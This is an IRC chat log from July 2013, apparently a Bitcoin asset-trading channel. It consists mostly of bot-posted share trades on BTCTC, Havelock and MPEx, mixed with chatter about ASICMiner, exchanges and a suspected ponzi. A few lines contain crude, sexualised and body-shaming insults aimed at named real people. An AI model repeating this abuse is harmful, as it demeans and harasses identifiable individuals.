BTC [+] Jul 02 06:08:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0395 = 0.079 BTC [-] Jul 02 06:12:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 02 06:12:16 [BTCTC] [ASICMINER-PT] 1 @ 4.525 BTC [+] Jul 02 06:14:28 [BTCTC] [ASICMINER-PT] 1 @ 4.430001 BTC [-] Jul 02 06:14:30 [BTCTC] [ASICMINER-PT] 1 @ 4.43 BTC [-] Jul 02 06:17:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [+] Jul 02 06:17:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [+] Jul 02 06:20:19 [BTCTC] [BASIC-MINING] 2 @ 0.17 = 0.34 BTC [-] Jul 02 06:21:19 unless you want to sell more than one, sure Jul 02 06:21:20 Aaand he's back! Welcome! We've missed you. Jul 02 06:21:29 [HAVELOCK] [ASICM] 4 @ 0.0453 = 0.1812 BTC [+] Jul 02 06:22:38 In interesting news, AM has announced that they will do exactly what they have already been doing, except with much higher cost. This, of course, propels the prices upwards, as you'd expect. Jul 02 06:23:03 Well, you'd expect it if you were completely bonkers, at least. Jul 02 06:23:23 valued at 2 million BTC yet ? Jul 02 06:23:48 Closing in on it. Jul 02 06:23:58 ridiculous Jul 02 06:24:07 only because i didin't buy any at IPO Jul 02 06:24:12 heh Jul 02 06:24:28 announced what? Jul 02 06:24:46 They'll be buying or building 800-1000TH. Jul 02 06:24:56 I see no mention of that Jul 02 06:25:07 Clean your glasses, it's all over the news. Jul 02 06:25:19 Oh, and that's this year. Jul 02 06:25:40 https://bitcointalk.org/index.php?action=profile;u=49840;sa=showPosts unless its in the ling ling bit I'm calling bullshit Jul 02 06:25:41 Which would get them from a hashrate of 35% to a hashrate of 35%. Jul 02 06:25:45 Latest posts of: friedcat Jul 02 06:26:02 and an opperating cost of.. Jul 02 06:26:25 Well, at least more than they have now. Jul 02 06:26:32 interestingly, friedcat has deleted the bit where he says 'obviously as everyone knows there is no rule of law in china' Jul 02 06:26:47 So, same income, higher cost, prices go up. Welcome to Bitcoin investments. Jul 02 06:26:59 furuknap: srsly, what news? Jul 02 06:27:23 C'mon, search the forums. It was a few days ago. I'm not your Google. Jul 02 06:27:36 even with fully half of the posters ignored i gave up on the thread Jul 02 06:27:46 friedcat hasnt said anything Jul 02 06:28:08 It was from a presentation AM held somewhere in China, translated in the thread somewhere. Jul 02 06:29:00 [MPEX] [S.MPOE] 2450 @ 0.0008289 = 2.0308 BTC [+] Jul 02 06:31:07 [HAVELOCK] [ASICM] 1 @ 0.04399999 BTC [-] Jul 02 06:31:20 [BTCTC] [AMC-PT] 32 @ 0.00099 = 0.0317 BTC [-] Jul 02 06:42:07 [HAVELOCK] [ASICM] 4 @ 0.04386005 = 0.1754 BTC [-] Jul 02 06:44:48 you'd think with a shit eating dickwhore like gmaxwell riding wikipedia's chief skank they would take btc donations <<< wait. what ?! Jul 02 06:45:31 Menoetius if it makes you feel better, i SOLD at ipo Jul 02 06:45:35 AND made money on the deal. Jul 02 06:45:44 [HAVELOCK] [ASICM] 2 @ 0.04512244 = 0.0902 BTC [+] Jul 02 06:49:11 mircea_popescu: what whatting about? Jul 02 06:50:39 kat walsh == wikipedia lawppopotamus and gmaxwell's sausage wallet Jul 02 06:52:39 [BTCTC] [ASICMINER-PT] 2 @ 4.5999 = 9.1998 BTC [+] Jul 02 06:52:43 [BTCTC] [ASICMINER-PT] 7 @ 4.599902 = 32.1993 BTC [+] **** BEGIN LOGGING AT Tue Jul 2 15:07:20 2013 Jul 02 15:09:49 [MPEX] [S.DICE] 500 @ 0.00206 = 1.03 BTC [-] Jul 02 15:12:03 [MPEX] [S.MPOE] 7900 @ 0.00083134 = 6.5676 BTC [+] Jul 02 15:12:28 Diablo-D3: more like if you believe Diablo-D3 needs to buy a tesla direct! Jul 02 15:12:31 ;) Jul 02 15:13:01 not loaded enough Jul 02 15:14:31 dub fascinating. i always suspected only a wikitard could be retarded enough to actually BE gmaxwell Jul 02 15:14:39 i mean, act him occasionally, for trollpurposes i can see Jul 02 15:14:43 [BTCTC] [AMC-PT] 50 @ 0.001659 = 0.083 BTC [+] Jul 02 15:14:49 but be him... well... that i can't see. Jul 02 15:15:00 [BTCTC] [S.MPOE-PT] 50 @ 0.000999 = 0.05 BTC [-] Jul 02 15:15:30 also, she's not really that fat. she's just big boned. Jul 02 15:15:32 in the face. Jul 02 15:15:52 [BTCTC] [AMC-PT] 1 @ 0.0005 BTC [-] Jul 02 15:16:23 [BTCTC] [S.MPOE-PT] 200 @ 0.000999 = 0.1998 BTC [-] Jul 02 15:24:54 [BTCTC] [AMC-PT] 8 @ 0.0014 = 0.0112 BTC [+] Jul 02 15:26:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.045979 = 0.1379 BTC [-] Jul 02 15:27:51 [BTCTC] [DMS.PURCHASE] 100 @ 0.049418 = 4.9418 BTC [-] Jul 02 15:30:46 [BTCTC] [AMC-PT] 20 @ 0.001659 = 0.0332 BTC [+] Jul 02 15:31:15 [HAVELOCK] [ASICM] 2 @ 0.043128 = 0.0863 BTC [-] Jul 02 15:32:24 [MPEX] [S.MPOE] 2450 @ 0.0008289 = 2.0308 BTC [-] Jul 02 15:33:38 [BTCTC] [AMC-PT] 150 @ 0.0015 = 0.225 BTC [-] Jul 02 15:33:40 [BTCTC] [AMC-PT] 120 @ 0.001401 = 0.1681 BTC [-] Jul 02 15:33:41 [BTCTC] [AMC-PT] 70 @ 0.001401 = 0.0981 BTC [-] Jul 02 15:33:42 [BTCTC] [AMC-PT] 8735 @ 0.0014 = 12.229 BTC [-] Jul 02 15:35:29 [BTCTC] [S.BBET-PT] 10 @ 0.0019 = 0.019 BTC [+] Jul 02 15:38:16 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004001 = 0.2001 BTC [+] Jul 02 15:38:18 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.004 = 4 BTC [-] Jul 02 15:42:20 http://qz.com/99413/first-ever-human-head-transplant-is-now-possible-says-neuroscientist/ Jul 02 15:42:23 First-ever human head transplant is now possible, says neuroscientist – Quartz Jul 02 15:47:22 ThickAsThieves: that's like the third time that this link is thrown around Jul 02 15:47:29 [HAVELOCK] [ASICM] 1 @ 0.043002 BTC [-] Jul 02 15:48:02 should post it on the forums, probably some folks willing to leave their bodies as collateral for a few bitcents loans Jul 02 15:48:04 so sorry Jul 02 15:48:22 i'll search the history before linking anything in the future Jul 02 15:49:04 ThickAsThieves: i didn't mean it like that :S Jul 02 15:49:42 sorry, feeling irritable, been ill Jul 02 15:49:56 apply for french citizenship Jul 02 15:49:59 [BTCTC] [ASICMINER-PT] 1 @ 4.55593 BTC [-] Jul 02 15:50:06 :-) Jul 02 15:50:38 [HAVELOCK] [ASICM] 5 @ 0.04301 = 0.2151 BTC [+] Jul 02 15:52:27 [HAVELOCK] [ASICM] 39 @ 0.044299 = 1.7277 BTC [+] Jul 02 15:53:09 [HAVELOCK] [ASICM] 100 @ 0.04429899 = 4.4299 BTC [-] Jul 02 15:53:11 [HAVELOCK] [ASICM] 75 @ 0.044299 = 3.3224 BTC [+] Jul 02 15:53:25 lmao Jul 02 15:53:31 they even have citizenship anymore ? Jul 02 15:56:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.045977 = 0.4598 BTC [-] Jul 02 15:57:11 [HAVELOCK] [ASICM] 45 @ 0.044299 = 1.9935 BTC [+] Jul 02 15:57:54 [BTCTC] [BASIC-MINING] 3 @ 0.176477 = 0.5294 BTC [+] Jul 02 15:58:43 [BTCTC] [DMS.MINING] 41 @ 0.019501 = 0.7995 BTC [-] Jul 02 15:58:45 [BTCTC] [DMS.MINING] 100 @ 0.0195 = 1.95 BTC [-] Jul 02 15:58:46 [BTCTC] [DMS.MINING] 64 @ 0.0192 = 1.2288 BTC [-] Jul 02 15:58:48 [BTCTC] [DMS.MINING] 63 @ 0.0191 = 1.2033 BTC [-] Jul 02 15:59:51 [BTCTC] [AMC-PT] 10 @ 0.00141 = 0.0141 BTC [+] Jul 02 16:04:13 [HAVELOCK] [ASICM] 3 @ 0.0435 = 0.1305 BTC [-] Jul 02 16:04:15 [HAVELOCK] [ASICM] 5 @ 0.0435 = 0.2175 BTC [-] Jul 02 16:04:37 [HAVELOCK] [ASICM] 38 @ 0.04346941 = 1.6518 BTC [-] Jul 02 16:05:09 [HAVELOCK] [ASICM] 1 @ 0.04346941 BTC [-] Jul 02 16:07:28 [BTCTC] [COGNITIVE] 1 @ 0.329999 BTC [+] Jul 02 16:10:44 [HAVELOCK] [SDICE] 4 @ 0.19999899 = 0.8 BTC [+] Jul 02 16:12:58 [BTCTC] [AMC-PT] 40 @ 0.00131 = 0.0524 BTC [-] Jul 02 16:14:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.045969 BTC [-] Jul 02 16:15:04 [HAVELOCK] [ASICM] 5 @ 0.04447699 = 0.2224 BTC [+] Jul 02 16:15:58 [HAVELOCK] [ASICM] 51 @ 0.044477 = 2.2683 BTC [+] Jul 02 16:16:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.045969 BTC [-] Jul 02 16:17:33 [BTCTC] [S.MPOE-PT] 1 @ 0.000999 BTC [-] Jul 02 16:19:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.045969 BTC [-] Jul 02 16:22:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.045968 BTC [-] Jul 02 16:24:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.04597 = 0.3218 BTC [+] Jul 02 16:25:29 [HAVELOCK] [ASICM] 101 @ 0.04351001 = 4.3945 BTC [-] Jul 02 16:26:16 [HAVELOCK] [ASICM] 5 @ 0.04351 = 0.2176 BTC [-] Jul 02 16:26:34 [HAVELOCK] [ASICM] 194 @ 0.04351 = 8.4409 BTC [-] Jul 02 16:26:48 [BTCTC] [DMS.SELLING] 10 @ 0.029989 = 0.2999 BTC [-] Jul 02 16:26:50 [BTCTC] [DMS.SELLING] 42 @ 0.029989 = 1.2595 BTC [-] Jul 02 16:27:21 [HAVELOCK] [ASICM] 3 @ 0.044478 = 0.1334 BTC [+] Jul 02 16:27:22 [HAVELOCK] [ASICM] 5 @ 0.0444788 = 0.2224 BTC [+] Jul 02 16:27:24 [HAVELOCK] [ASICM] 150 @ 0.04447889 = 6.6718 BTC [+] Jul 02 16:27:25 [HAVELOCK] [ASICM] 142 @ 0.0444789 = 6.316 BTC [+] Jul 02 16:27:46 [HAVELOCK] [ASICM] 106 @ 0.0444789 = 4.7148 BTC [+] Jul 02 16:28:15 [HAVELOCK] [ASICM] 97 @ 0.04447899 = 4.3145 BTC [+] Jul 02 16:29:59 [BTCTC] [DMS.SELLING] 40 @ 0.02999 = 1.1996 BTC [+] Jul 02 16:30:10 [HAVELOCK] [SDICE] 1 @ 0.1849999 BTC [-] Jul 02 16:30:31 [BTCTC] [DMS.SELLING] 26 @ 0.03 = 0.78 BTC [+] Jul 02 16:31:08 [BTCTC] [DMS.SELLING] 20 @ 0.030699 = 0.614 BTC [+] Jul 02 16:32:42 [BTCTC] [DMS.SELLING] 10 @ 0.030799 = 0.308 BTC [+] Jul 02 16:32:44 [BTCTC] [DMS.SELLING] 125 @ 0.0308 = 3.85 BTC [+] Jul 02 16:33:02 [HAVELOCK] [HIM] 5 @ 0.3 = 1.5 BTC [+] Jul 02 16:33:14 [BTCTC] [ASICMINER-PT] 1 @ 4.675 BTC [+] Jul 02 16:34:51 [BTCTC] [ASICMINER-PT] 1 @ 4.6759 BTC [+] Jul 02 16:35:08 [BTCTC] [DMS.MINING] 37 @ 0.0191 = 0.7067 BTC [-] Jul 02 16:35:10 [BTCTC] [DMS.MINING] 1 @ 0.0191 BTC [-] Jul 02 16:35:10 [BTCTC] [DMS.MINING] 118 @ 0.019 = 2.242 BTC [-] Jul 02 16:35:51 [BTCTC] [BASIC-MINING] 8 @ 0.166005 = 1.328 BTC [-] Jul 02 16:36:09 [BTCTC] [DMS.SELLING] 25 @ 0.0308 = 0.77 BTC [+] Jul 02 16:37:18 [BTCTC] [DMS.SELLING] 6 @ 0.0308 = 0.1848 BTC [+] Jul 02 16:38:04 wow Jul 02 16:38:23 [BTCTC] [DMS.PURCHASE] 189 @ 0.049418 = 9.34 BTC [-] Jul 02 16:38:52 sorry -- wrong chan Jul 02 16:39:25 [BTCTC] [BASIC-MINING] 4 @ 0.176475 = 0.7059 BTC [+] Jul 02 16:40:34 [BTCTC] [AMC-PT] 4 @ 0.001625 = 0.0065 BTC [+] Jul 02 16:40:47 [BTCTC] [AMC-PT] 25 @ 0.001414 = 0.0354 BTC [-] Jul 02 16:42:12 [HAVELOCK] [ASICM] 11 @ 0.0438 = 0.4818 BTC [-] Jul 02 16:44:08 [HAVELOCK] [ASICM] 10 @ 0.04447899 = 0.4448 BTC [+] Jul 02 16:48:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.0459 = 0.1836 BTC [-] Jul 02 16:52:57 [BTCTC] [AMC-PT] 1 @ 0.00162 BTC [+] Jul 02 16:58:11 [BTCTC] [S.DICE-PT] 1 @ 0.002347 BTC [+] Jul 02 16:58:31 [BTCTC] [AMC-PT] 1 @ 0.00162 BTC [+] Jul 02 16:59:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.045001 = 0.135 BTC [-] Jul 02 17:01:00 [BTCTC] [GSDPT] 1 @ 0.00238 BTC [+] Jul 02 17:02:34 [BTCTC] [ASICMINER-PT] 2 @ 4.6749 = 9.3498 BTC [-] Jul 02 17:02:35 [BTCTC] [ASICMINER-PT] 1 @ 4.675 BTC [+] Jul 02 17:02:37 [BTCTC] [ASICMINER-PT] 2 @ 4.67559 = 9.3512 BTC [+] Jul 02 17:02:39 [BTCTC] [ASICMINER-PT] 1 @ 4.676 BTC [+] Jul 02 17:02:48 [BTCTC] [ASICMINER-PT] 6 @ 4.676 = 28.056 BTC [+] Jul 02 17:02:50 [BTCTC] [ASICMINER-PT] 5 @ 4.677 = 23.385 BTC [+] Jul 02 17:02:52 [BTCTC] [ASICMINER-PT] 10 @ 4.679 = 46.79 BTC [+] Jul 02 17:02:54 [BTCTC] [ASICMINER-PT] 6 @ 4.67985 = 28.0791 BTC [+] Jul 02 17:02:56 [BTCTC] [ASICMINER-PT] 10 @ 4.6799 = 46.799 BTC [+] Jul 02 17:02:58 [BTCTC] [ASICMINER-PT] 15 @ 4.738999 = 71.085 BTC [+] Jul 02 17:03:07 [BTCTC] [ASICMINER-PT] 3 @ 4.739 = 14.217 BTC [+] Jul 02 17:03:13 [BTCTC] [ASICMINER-PT] 14 @ 4.74 = 66.36 BTC [+] Jul 02 17:03:13 [BTCTC] [BASIC-MINING] 3 @ 0.166006 = 0.498 BTC [-] Jul 02 17:03:15 [BTCTC] [ASICMINER-PT] 14 @ 4.7499 = 66.4986 BTC [+] Jul 02 17:03:17 [BTCTC] [ASICMINER-PT] 4 @ 4.75 = 19 BTC [+] Jul 02 17:03:19 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 02 17:03:21 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 02 17:03:23 [BTCTC] [ASICMINER-PT] 3 @ 4.78 = 14.34 BTC [+] Jul 02 17:03:29 [BTCTC] [ASICMINER-PT] 9 @ 4.79 = 43.11 BTC [+] Jul 02 17:03:31 [BTCTC] [ASICMINER-PT] 10 @ 4.799999 = 48 BTC [+] Jul 02 17:03:33 [BTCTC] [ASICMINER-PT] 17 @ 4.8 = 81.6 BTC [+] Jul 02 17:03:35 [BTCTC] [ASICMINER-PT] 17 @ 4.8 = 81.6 BTC [+] Jul 02 17:03:42 [BTCTC] [ASICMINER-PT] 5 @ 4.8 = 24 BTC [+] Jul 02 17:04:50 http://trilema.com/2013/accounting-for-the-nonzero-asset-corporation-the-mpex-standard/ Jul 02 17:04:52 Accounting for the nonzero asset corporation. The MPEx standard. pe Trilema - Un blog de Mircea Pope Jul 02 17:05:08 [BTCTC] [TAT.ASICMINER] 23 @ 0.045897 = 1.0556 BTC [+] Jul 02 17:05:14 [BTCTC] [TAT.ASICMINER] 18 @ 0.045898 = 0.8262 BTC [+] Jul 02 17:05:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0459 BTC [+] Jul 02 17:05:45 [BTCTC] [TAT.ASICMINER] 100 @ 0.04596 = 4.596 BTC [+] Jul 02 17:05:47 [BTCTC] [TAT.ASICMINER] 37 @ 0.04597 = 1.7009 BTC [+] Jul 02 17:07:26 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 02 17:07:52 [BTCTC] [TAT.ASICMINER] 56 @ 0.0464 = 2.5984 BTC [+] Jul 02 17:09:09 [BTCTC] [AMC-PT] 188 @ 0.00162 = 0.3046 BTC [+] Jul 02 17:09:11 [BTCTC] [AMC-PT] 60 @ 0.00162 = 0.0972 BTC [+] Jul 02 17:09:17 [BTCTC] [ASICMINER-PT] 1 @ 4.601 BTC [+] Jul 02 17:09:19 [BTCTC] [ASICMINER-PT] 2 @ 4.6 = 9.2 BTC [-] Jul 02 17:09:23 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 02 17:11:53 [BTCTC] [S.MPOE-PT] 200 @ 0.000999 = 0.1998 BTC [-] Jul 02 17:15:24 [BTCTC] [AMC-PT] 60 @ 0.001658 = 0.0995 BTC [+] Jul 02 17:15:26 [BTCTC] [AMC-PT] 141 @ 0.001659 = 0.2339 BTC [+] Jul 02 17:17:01 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 02 17:17:12 [BTCTC] [AMC-PT] 300 @ 0.00166 = 0.498 BTC [+] Jul 02 17:23:58 [BTCTC] [AMC-PT] 100 @ 0.0015 = 0.15 BTC [-] Jul 02 17:24:56 [BTCTC] [ASICMINER-PT] 1 @ 4.57 BTC [-] Jul 02 17:25:44 [BTCTC] [TAT.ASICMINER] 51 @ 0.0468 = 2.3868 BTC [+] Jul 02 17:25:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.0462 = 0.1386 BTC [-] Jul 02 17:25:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.0462 = 0.462 BTC [-] Jul 02 17:26:38 [BTCTC] [BITVPS] 21 @ 0.00108 = 0.0227 BTC [-] Jul 02 17:27:14 [BTCTC] [BITVPS] 750 @ 0.001071 = 0.8033 BTC [-] Jul 02 17:27:29 [BTCTC] [COGNITIVE] 4 @ 0.326 = 1.304 BTC [-] Jul 02 17:27:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.0454 = 0.227 BTC [-] Jul 02 17:27:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0453 = 0.453 BTC [-] Jul 02 17:27:54 [BTCTC] [BITVPS] 300 @ 0.00107 = 0.321 BTC [-] Jul 02 17:28:13 [BTCTC] [BITVPS] 100 @ 0.00094 = 0.094 BTC [-] Jul 02 17:28:25 [HAVELOCK] [ASICM] 11 @ 0.04447888 = 0.4893 BTC [-] Jul 02 17:28:45 [BTCTC] [BITVPS] 100 @ 0.000922 = 0.0922 BTC [-] Jul 02 17:28:53 [HAVELOCK] [ASICM] 93 @ 0.04447899 = 4.1365 BTC [+] Jul 02 17:29:15 [BTCTC] [BITVPS] 2229 @ 0.000921 = 2.0529 BTC [-] Jul 02 17:29:41 [HAVELOCK] [ASICM] 68 @ 0.04447899 = 3.0246 BTC [+] Jul 02 17:30:02 [BTCTC] [AMC-PT] 2 @ 0.0015 = 0.003 BTC [-] Jul 02 17:30:26 [BTCTC] [ASICMINER-PT] 1 @ 4.6099 BTC [+] Jul 02 17:30:28 [BTCTC] [ASICMINER-PT] 1 @ 4.6099 BTC [+] Jul 02 17:30:29 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [+] Jul 02 17:30:50 [BTCTC] [AMC-PT] 26 @ 0.00166 = 0.0432 BTC [+] Jul 02 17:31:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.046799 = 1.17 BTC [+] Jul 02 17:32:09 [BTCTC] [TAT.ASICMINER] 31 @ 0.0468 = 1.4508 BTC [+] Jul 02 17:34:35 [BTCTC] [TAT.ASICMINER] 20 @ 0.046888 = 0.9378 BTC [+] Jul 02 17:34:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.046888 BTC [+] Jul 02 17:37:19 [BTCTC] [TAT.ASICMINER] 15 @ 0.0454 = 0.681 BTC [-] Jul 02 17:37:56 [BTCTC] [AMC-PT] 20 @ 0.00166 = 0.0332 BTC [+] Jul 02 17:38:55 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.003953 = 0.0435 BTC [-] Jul 02 17:44:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.046888 = 0.1876 BTC [+] Jul 02 17:47:22 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Jul 02 17:47:38 [BTCTC] [AMC-PT] 584 @ 0.00166 = 0.9694 BTC [+] Jul 02 17:47:39 [BTCTC] [AMC-PT] 95 @ 0.0017 = 0.1615 BTC [+] Jul 02 17:48:50 [BTCTC] [S.BBET-PT] 10 @ 0.00196 = 0.0196 BTC [+] Jul 02 17:48:59 [HAVELOCK] [ASICM] 11 @ 0.04447899 = 0.4893 BTC [+] Jul 02 17:51:36 Wow, been off for a week, what happend to the AM shares price? Jul 02 17:51:48 Glad I own a few :). Jul 02 17:51:57 [BTCTC] [TAT.ASICMINER] 1 @ 3.5 BTC [+] Jul 02 17:52:00 [BTCTC] [CRYPTO-TRADE] 20 @ 0.198301 = 3.966 BTC [-] Jul 02 17:52:14 [BTCTC] [AMC-PT] 1 @ 0.001735 BTC [+] Jul 02 17:53:04 [BTCTC] [GSDPT] 1 @ 0.00219 BTC [-] Jul 02 17:54:36 [HAVELOCK] [ASICM] 3 @ 0.04447899 = 0.1334 BTC [+] Jul 02 17:54:48 [MPEX] [S.MPOE] 2476 @ 0.00083134 = 2.0584 BTC [+] Jul 02 17:55:01 [MPEX] [S.MPOE] 1058 @ 0.00083253 = 0.8808 BTC [+] Jul 02 17:56:55 [BTCTC] [DMS.SELLING] 2 @ 0.031988 = 0.064 BTC [+] Jul 02 17:58:00 [BTCTC] [DMS.SELLING] 10 @ 0.031988 = 0.3199 BTC [+] Jul 02 17:59:22 [HAVELOCK] [ASICM] 164 @ 0.04447899 = 7.2946 BTC [+] Jul 02 17:59:23 [HAVELOCK] [ASICM] 183 @ 0.0444909 = 8.1418 BTC [+] Jul 02 17:59:25 [HAVELOCK] [ASICM] 303 @ 0.0444919 = 13.481 BTC [+] Jul 02 17:59:26 [HAVELOCK] [ASICM] 50 @ 0.04498765 = 2.2494 BTC [+] Jul 02 17:59:34 [HAVELOCK] [ASICM] 50 @ 0.04498765 = 2.2494 BTC [+] Jul 02 18:00:38 [BTCTC] [DMS.PURCHASE] 2 @ 0.046305 = 0.0926 BTC [-] Jul 02 18:01:02 [BTCTC] [DMS.PURCHASE] 11 @ 0.0463 = 0.5093 BTC [-] Jul 02 18:01:34 [BTCTC] [ASICMINER-PT] 3 @ 4.699 = 14.097 BTC [+] Jul 02 18:01:39 [BTCTC] [DMS.SELLING] 1 @ 0.030801 BTC [-] Jul 02 18:02:17 [BTCTC] [AMC-PT] 63 @ 0.001734 = 0.1092 BTC [-] Jul 02 18:02:19 [BTCTC] [AMC-PT] 38 @ 0.001735 = 0.0659 BTC [+] Jul 02 18:02:20 [BTCTC] [AMC-PT] 15 @ 0.00174 = 0.0261 BTC [+] Jul 02 18:02:21 [BTCTC] [AMC-PT] 301 @ 0.00175 = 0.5268 BTC [+] Jul 02 18:02:23 [BTCTC] [AMC-PT] 2000 @ 0.001752 = 3.504 BTC [+] Jul 02 18:02:24 [BTCTC] [DMS.MINING] 1 @ 0.019 BTC [-] Jul 02 18:02:25 [BTCTC] [AMC-PT] 16 @ 0.001752 = 0.028 BTC [+] Jul 02 18:02:43 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [+] Jul 02 18:02:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.046888 = 0.7033 BTC [-] Jul 02 18:03:06 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 02 18:03:19 [BTCTC] [AMC-PT] 48 @ 0.001752 = 0.0841 BTC [+] Jul 02 18:03:20 [BTCTC] [AMC-PT] 15 @ 0.0018 = 0.027 BTC [+] Jul 02 18:03:53 [HAVELOCK] [ASICM] 66 @ 0.045123 = 2.9781 BTC [+] Jul 02 18:04:24 [HAVELOCK] [ASICM] 100 @ 0.04512345 = 4.5123 BTC [+] Jul 02 18:05:12 [HAVELOCK] [ASICM] 10 @ 0.0452 = 0.452 BTC [+] Jul 02 18:12:17 [BTCTC] [S.DICE-PT] 7 @ 0.002101 = 0.0147 BTC [-] Jul 02 18:13:04 [HAVELOCK] [ASICM] 1 @ 0.0452 BTC [+] Jul 02 18:13:15 [BTCTC] [AMC-PT] 100 @ 0.001996 = 0.1996 BTC [+] Jul 02 18:13:43 [BTCTC] [AMC-PT] 100 @ 0.001996 = 0.1996 BTC [+] Jul 02 18:14:21 [BTCTC] [AMC-PT] 501 @ 0.001997 = 1.0005 BTC [+] Jul 02 18:14:33 Hey guys! Jul 02 18:15:11 Hi Jul 02 18:15:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.046888 = 0.4689 BTC [-] Jul 02 18:15:21 Ah, my good old friend ThickAsThieves ;) Jul 02 18:15:50 hello. Jul 02 18:15:57 Stealing shares from right under my nose ;) Jul 02 18:16:04 o/ mircea_popescu! Jul 02 18:16:36 https://bitcointalk.org/index.php?action=profile Jul 02 18:16:38 and Jul 02 18:16:39 An Error Has Occurred! Jul 02 18:16:54 http://www.reddit.com/user/matthew_boyd/ Jul 02 18:16:56 overview for matthew_boyd Jul 02 18:17:51 Did you get the links? Jul 02 18:17:55 hang on lol Jul 02 18:18:09 Sure :) Jul 02 18:18:25 ok so you're on reddit. cool. Jul 02 18:18:39 Yea! Have you ever heard of /r/Jobs4Bitcoins? Jul 02 18:18:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.046888 = 0.4689 BTC [-] Jul 02 18:19:01 i don't think so. Jul 02 18:19:02 your first link is wrong. it's the "see my profile" url Jul 02 18:19:29 pankkake https://bitcointalk.org/index.php?topic=144506.0 Jul 02 18:19:45 woops, sorry about that :( Jul 02 18:19:50 [BTCTC] [S.DICE-PT] 5 @ 0.002347 = 0.0117 BTC [+] Jul 02 18:19:51 meanwhile elsewhere in the world, "Your logins for your new Dedcicated Server are below" Jul 02 18:19:57 teh ppl know i host chicks. Jul 02 18:20:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.046888 = 0.0938 BTC [-] Jul 02 18:20:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.046888 BTC [-] Jul 02 18:21:05 Ahh, I want my btc out of coinlenders so that I can invest it... Jul 02 18:21:38 [BTCTC] [AMC-PT] 1 @ 0.001998 BTC [+] Jul 02 18:21:49 prol;ly best take it slow. Jul 02 18:22:15 yeah, you might dismantle the coinlenders ponzi Jul 02 18:22:16 [BTCTC] [AMC-PT] 8 @ 0.001997 = 0.016 BTC [-] Jul 02 18:22:18 [BTCTC] [AMC-PT] 45 @ 0.001996 = 0.0898 BTC [-] Jul 02 18:22:19 [BTCTC] [AMC-PT] 444 @ 0.001901 = 0.844 BTC [-] Jul 02 18:22:22 What do you mean? Jul 02 18:22:42 [BTCTC] [TAT.ASICMINER] 7 @ 0.046888 = 0.3282 BTC [-] Jul 02 18:22:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.04745 = 0.1424 BTC [+] Jul 02 18:22:45 my comment was a joke, mp's was warning you not to invest too aggresively Jul 02 18:22:51 aggressively* Jul 02 18:23:08 Ah, sorry, kind of new to the whole investing thing, not that new to Bitcoins though... Jul 02 18:23:13 [BTCTC] [AMC-PT] 2 @ 0.001998 = 0.004 BTC [+] Jul 02 18:23:59 I do like this bot, very very handy! Jul 02 18:24:55 note it doesnt display Bitfunder trades Jul 02 18:25:06 you should also join #bitfunder if you wanna see those Jul 02 18:25:19 what is bitfunder? Jul 02 18:25:30 Hey ThickAsThieves, So glad I bought AM 2 weeks ago. Jul 02 18:25:39 :) Jul 02 18:25:48 assbot: the worst exchange ever made Jul 02 18:25:55 [BTCTC] [AMC-PT] 50 @ 0.001998 = 0.0999 BTC [+] Jul 02 18:26:02 bitfunder is where your brother assetbot and brother ozbot live Jul 02 18:26:11 It could be worse ... it is alt least better than the GLBSE Jul 02 18:26:42 i dont really see what makes BTCT any better or worse than BF Jul 02 18:26:52 they each have things to criticize Jul 02 18:27:07 btct has better charts, and email notifications for trades Jul 02 18:27:14 given that the guys who operate weexchange do not reply to support and can't handle some kind of passwords, no, it is already worse Jul 02 18:27:15 really Havelock seems to be better than both in ways Jul 02 18:27:48 "getting your bitcoins back" is kind of an important feature Jul 02 18:28:08 ive never had any issues in that regard Jul 02 18:28:29 easier to get my coins outta there than BTCT that's for sure Jul 02 18:29:01 thankfully I did not give them any money before the issue arised. but it just smells really bad. at least the password issue tells it's coded by drunk monkeys Jul 02 18:29:26 https://bitcointalk.org/index.php?topic=248406.msg2636077 <--- if you guys want a good laugh Jul 02 18:29:32 BFL ASIC seized by EU , european & german Customs Jul 02 18:30:09 lol Jul 02 18:30:38 this is priceless Jul 02 18:31:41 well.. Jul 02 18:31:43 ;;ud inaba Jul 02 18:31:44 http://www.urbandictionary.com/define.php?term=inaba | Stuck-up Lesbian Roleplayer Typically applied to males who play females in online games and try to hook it up with other females (probably played b... Jul 02 18:31:47 Urban Dictionary: inaba Jul 02 18:32:00 again with the lesbians Jul 02 18:32:01 wtf Jul 02 